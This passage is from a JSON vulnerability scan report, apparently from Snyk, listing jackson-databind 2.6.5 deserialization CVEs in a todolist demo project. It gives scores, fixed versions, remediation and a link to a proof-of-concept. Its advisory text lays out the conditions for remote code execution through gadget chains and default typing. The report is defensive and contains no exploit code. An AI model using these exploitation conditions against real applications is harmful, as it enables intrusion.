out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 